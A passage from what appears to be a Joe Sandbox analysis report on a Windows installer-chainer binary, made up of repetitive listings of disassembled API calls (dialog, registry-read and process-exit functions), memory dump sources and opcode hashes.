                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Path$AppendExistsFileFindFolderHeapProcessResource
                                          • String ID: WindowsPowerShell\v1.0\powershell.exe
                                          • API String ID: 2424349261-2665178159
                                          • Opcode ID: bc9bac6104ac64d47f3a841be74768eba7dc155b561a55885e175c2bb072b960
                                          • Instruction ID: 0b336a48359c2e4cbefa9add7007a5471c162864098975e99cfd7de2278e3a0d
                                          • Opcode Fuzzy Hash: bc9bac6104ac64d47f3a841be74768eba7dc155b561a55885e175c2bb072b960
                                          • Instruction Fuzzy Hash: B7418E726046489FDF64DF68DC49BEA77E8FF04710F104529F91ADB682EB74AA04CB50
                                          APIs
                                          • GetDlgItem.USER32(?,0000040A), ref: 000A0229
                                          • SetWindowTextW.USER32(00000000,?), ref: 000A0230
                                          • GetDlgItem.USER32(00000000,0000040B), ref: 000A0241
                                          • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 000A024E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Item$MessageSendTextWindow
                                          • String ID:
                                          • API String ID: 2101643998-0
                                          • Opcode ID: 208f4d52fd38e255c8b85355903fc7e281a1365ffaa0de2ab8e158c592ba23f6
                                          • Instruction ID: bd0c9f3ea62e24fb18679acfddcde91a1ec705020d33a3155081ef4aca2eb30a
                                          • Opcode Fuzzy Hash: 208f4d52fd38e255c8b85355903fc7e281a1365ffaa0de2ab8e158c592ba23f6
                                          • Instruction Fuzzy Hash: 62F03772500716BBEA114FA4DC08E6ABBBAFF48B11B088519F604639A0C771A862DF90
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00098499
                                          • DestroyWindow.USER32(00000005), ref: 000984A8
                                          • PostMessageW.USER32(00000005,00000401,00000000,00000000), ref: 000984C6
                                          • IsWindow.USER32(00000005), ref: 000984D5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$CurrentDestroyMessagePostThread
                                          • String ID:
                                          • API String ID: 3186974096-0
                                          • Opcode ID: ff3025ea5cc97f600ea69adb6d2e1c69b58c48533d2a6bc05f62b71582df6514
                                          • Instruction ID: fe6ca64727d4bb38dbf092c9e1df87cffb57cb59be5b4754c3378ba31698538c
                                          • Opcode Fuzzy Hash: ff3025ea5cc97f600ea69adb6d2e1c69b58c48533d2a6bc05f62b71582df6514
                                          • Instruction Fuzzy Hash: 8CF082711017909AE7B09B29EE0CB57BBE56F45B00F01890DE58296EA0C7B8F840DB18
                                          APIs
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • _wcsrchr.LIBVCRUNTIME ref: 00084A01
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: HeapProcess_wcsrchr
                                          • String ID: \\?\$p1Wu
                                          • API String ID: 3185730412-4207130029
                                          • Opcode ID: 3d52e05aa39ede076d561de62b17d6e0b211faca139ddfc5b5b559e648781d6c
                                          • Instruction ID: 1d33e6c6d01fb845444532a7884fe82542642ce99fc5301ea8486b84eb57e459
                                          • Opcode Fuzzy Hash: 3d52e05aa39ede076d561de62b17d6e0b211faca139ddfc5b5b559e648781d6c
                                          • Instruction Fuzzy Hash: 5441C370A00506DBCB14EB68C848BAEF7F5FF40324F148269E461DB2D2EB319D04CB91
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00020019,?,D11C52E5), ref: 0009C5C0
                                          • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0009C5FE
                                          • RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00020019,0000000C,?), ref: 0009C64F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Open$InfoQuery
                                          • String ID:
                                          • API String ID: 223210943-0
                                          • Opcode ID: 1b095932c1b94128fbb51fb7a8326be3c3928af57699e97acd2caacba6ff6642
                                          • Instruction ID: 9838a2e4ac396b5c9e945b44b36fcaa23c5a3f6722bd019b9a192c3d58f1f5f9
                                          • Opcode Fuzzy Hash: 1b095932c1b94128fbb51fb7a8326be3c3928af57699e97acd2caacba6ff6642
                                          • Instruction Fuzzy Hash: DE219176A40609AFEB20CF84DD41F9AF7A8FB04710F20416AFA15E76C0D7B1A914CB91
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 000A02A7
                                          • EndDialog.USER32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000F7B4D,000000FF), ref: 000A0310
                                          • CoUninitialize.OLE32(00000000,?,?,?,?,?,000F7B4D,000000FF), ref: 000A0320
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: DialogInitializeUninitialize
                                          • String ID:
                                          • API String ID: 112388368-0
                                          • Opcode ID: 3201b3a74148eb7710ba4696a377295b0416042c3ed44be8e7b4842dd9891840
                                          • Instruction ID: 2cf0b37877bd43d8e74bd5f3e6a1a0136ec09eb117d25ebc7c9b26a68b03f934
                                          • Opcode Fuzzy Hash: 3201b3a74148eb7710ba4696a377295b0416042c3ed44be8e7b4842dd9891840
                                          • Instruction Fuzzy Hash: 3221AC32A01618ABDF608F98C914BAEB7E8EF5AB10F044299EA4197391DB74ED008690
                                          APIs
                                          • GetDlgItem.USER32(?,0000040B), ref: 000A00AD
                                          • SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 000A00C8
                                          • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 000A00D8
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: MessageSend$Item
                                          • String ID:
                                          • API String ID: 3888421826-0
                                          • Opcode ID: c126cbc8f3e7280c57753d78cb5045d7d645bd0c460909c0c4cd19b47608d1c7
                                          • Instruction ID: 7b2660e77ebe396f3f5988921e2058afd2cadd68d0a23e4921e46c0b0ce4c783
                                          • Opcode Fuzzy Hash: c126cbc8f3e7280c57753d78cb5045d7d645bd0c460909c0c4cd19b47608d1c7
                                          • Instruction Fuzzy Hash: 5DF030B52403156FF7109F15DC4EFBA7798EB08711F148415F700A62D0C3BA59059B68
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,000DAA2B,?,000D1672,?,?,D11C52E5,000D1672,?), ref: 000DAA42
                                          • TerminateProcess.KERNEL32(00000000,?,000DAA2B,?,000D1672,?,?,D11C52E5,000D1672,?), ref: 000DAA49
                                          • ExitProcess.KERNEL32 ref: 000DAA5B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: cc88304662187e5e2c4ea0ad61065580328cef83c7d36519d14e0f6b8452af99
                                          • Instruction ID: e25dadc0d040a995e4979c8e94dacc2ae4a947ac777eab431871d990f3ab553d
                                          • Opcode Fuzzy Hash: cc88304662187e5e2c4ea0ad61065580328cef83c7d36519d14e0f6b8452af99
                                          • Instruction Fuzzy Hash: 9ED05E31000284BFEF002F68DD0D89C3F26AF01340B004111B80846232CFB59981EB63
                                          APIs
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 000986C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID: $
                                          • API String ID: 1378638983-3993045852
                                          • Opcode ID: e117570e5445fde43f43da457ea875cad5c4a2728c1f028dbf642e3a0360097c
                                          • Instruction ID: 0ed76d2da66fdc90b4a703b5d04c94ff3d2b585e2928cdc16ca1bbf5cb4443b1
                                          • Opcode Fuzzy Hash: e117570e5445fde43f43da457ea875cad5c4a2728c1f028dbf642e3a0360097c
                                          • Instruction Fuzzy Hash: 1A31B671108380DBDBA49F09C888B1ABBF0BB8A724F04855DF9948F3A5DB75D944CF92
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: 103b25dccbb9852772f78d39df23d199962abbfc09354eec647e4584e8fc95e7
                                          • Instruction ID: c5797ce9054ffe915c0f55a6f2b663dd06f59c1ea34bd45a159823c998ca1585
                                          • Opcode Fuzzy Hash: 103b25dccbb9852772f78d39df23d199962abbfc09354eec647e4584e8fc95e7
                                          • Instruction Fuzzy Hash: 93B01295299031EE310493543D0AE3F122CC3C4B10330801EF401D4081D9400C250072
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: f16751be6b91d6ee135a161c6c747fe19718d6342d3952bc73d35b41facdf64e
                                          • Instruction ID: b4e0a6e495ae4de1516e6f779f59b0463244d297d7c4733c142e83cbbbadf6b4
                                          • Opcode Fuzzy Hash: f16751be6b91d6ee135a161c6c747fe19718d6342d3952bc73d35b41facdf64e
                                          • Instruction Fuzzy Hash: 1FB01295299131EE310493547D0AE3F115CC3C4B10330411EF001D4081D9500C610072
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: b06afb09beaba7967004a266543f140e6136c3c646f7a546d23b802558234658
                                          • Instruction ID: 016a11d81e696176d3a74d1a3345f6f82f83c130e6398e736fa913e15f057c72
                                          • Opcode Fuzzy Hash: b06afb09beaba7967004a266543f140e6136c3c646f7a546d23b802558234658
                                          • Instruction Fuzzy Hash: 20B01291299031EE315493547E0AF3F111DC3C4B10330802EF001D4081D9410C210072
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: 10a5f445a40bbe54e44ebc8d7665e7badce587c2e601cc5e285a6acb960d02e7
                                          • Instruction ID: 2e1f8697b6e756990cc661392ff8cfe77541cf27954df45d39086cddc0f83ad8
                                          • Opcode Fuzzy Hash: 10a5f445a40bbe54e44ebc8d7665e7badce587c2e601cc5e285a6acb960d02e7
                                          • Instruction Fuzzy Hash: 14B01291299031EE311493543D0AE3F111CD3C4B10330441EF001E40C1D9400C200072
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: 4b8609cbaa5e749e30a9f9c3d3325b7ab052812efddc07102ea33876b6fc123a
                                          • Instruction ID: 0e351dee7a86f70da01b9b02c6404ab153fe80ca49678a03f5179de23cc0a917
                                          • Opcode Fuzzy Hash: 4b8609cbaa5e749e30a9f9c3d3325b7ab052812efddc07102ea33876b6fc123a
                                          • Instruction Fuzzy Hash: F2B01291699131EE311493543D0AE3F115CC3C4B10330411EF001D4081D9500C6000B2
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: e6c2ed2fc86d846ebd4c1829edf0ecb5a5baf66493c9e24b7e74ef42a54d8e33
                                          • Instruction ID: 76bfe4ba32c424a233875bb177bbe34e6fe468c3563a012a08f8291717b4aada
                                          • Opcode Fuzzy Hash: e6c2ed2fc86d846ebd4c1829edf0ecb5a5baf66493c9e24b7e74ef42a54d8e33
                                          • Instruction Fuzzy Hash: 73B01291299031EE311493943D0AE3F111CC3C4B10330801EF401D4081D9400C201072
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: 4530d4ff8280ea15380de07c1fcdada5e2171e598de72b4697393fa9984003e5
                                          • Instruction ID: 66faf62b274baf668b6914fce698e98174e0d48bb31b60ec34e6a882a4862a8a
                                          • Opcode Fuzzy Hash: 4530d4ff8280ea15380de07c1fcdada5e2171e598de72b4697393fa9984003e5
                                          • Instruction Fuzzy Hash: 95B012A1299031EE314493543E0AE3F119CC3C4B10330802EF001D4081D9410C210072
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: 12790cbeac4efced9aadd9b3c4938b00140034eb2a1f7052e016b39bdf96d43a
                                          • Instruction ID: fe6334af3f50b78dbc50004b6727a52d62492a38c47d64994523f13893f4e0f5
                                          • Opcode Fuzzy Hash: 12790cbeac4efced9aadd9b3c4938b00140034eb2a1f7052e016b39bdf96d43a
                                          • Instruction Fuzzy Hash: 09B01291299031EE310493643D0AE3F115CC3C4B50330801EF401D4081DA400C200072
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID: hu
                                          • API String ID: 697777088-423011080
                                          • Opcode ID: aa306df16ee6cbff3400aaed82528e86399aa4c1607077b9228fc87c174f9416
                                          • Instruction ID: f96126473c9bb5d8d34daaef3598405c84be3ba005c84ea0253a5a89685d4468
                                          • Opcode Fuzzy Hash: aa306df16ee6cbff3400aaed82528e86399aa4c1607077b9228fc87c174f9416
                                          • Instruction Fuzzy Hash: 60B01291299131EE310493543D0AE3F119CC3C4B10330411EF001D4081D9510C600072
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000C9A97
                                            • Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
                                            • Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
                                            • Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
